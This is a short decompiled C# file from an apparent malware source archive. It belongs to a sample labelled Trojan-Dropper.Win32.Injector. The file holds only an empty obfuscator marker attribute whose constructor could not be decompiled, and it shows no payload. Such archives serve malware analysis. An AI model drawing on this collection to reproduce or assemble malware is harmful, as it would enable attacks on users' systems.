MalwareSourceCode/MSIL/Trojan-Dropper/Win32/I/Trojan-Dropper.Win32.Injector.epwx-6071ef40caa18e93eea0d00f252e0ef03c97d96be12ad3f375d8a38aa3517cd6/ConfusedByAttribute.cs
2022-08-18 06:28:56 -05:00

17 lines
579 B
C#

// Decompiled with JetBrains decompiler
// Type: ConfusedByAttribute
// Assembly: scan, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: C0A4408A-6830-4FA8-819B-3D801C5B54D7
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan-Dropper.Win32.Injector.epwx-6071ef40caa18e93eea0d00f252e0ef03c97d96be12ad3f375d8a38aa3517cd6.exe
using System;
using System.Runtime.InteropServices;
internal class ConfusedByAttribute : Attribute
{
public ConfusedByAttribute([In] string obj0)
{
// ISSUE: unable to decompile the method.
}
}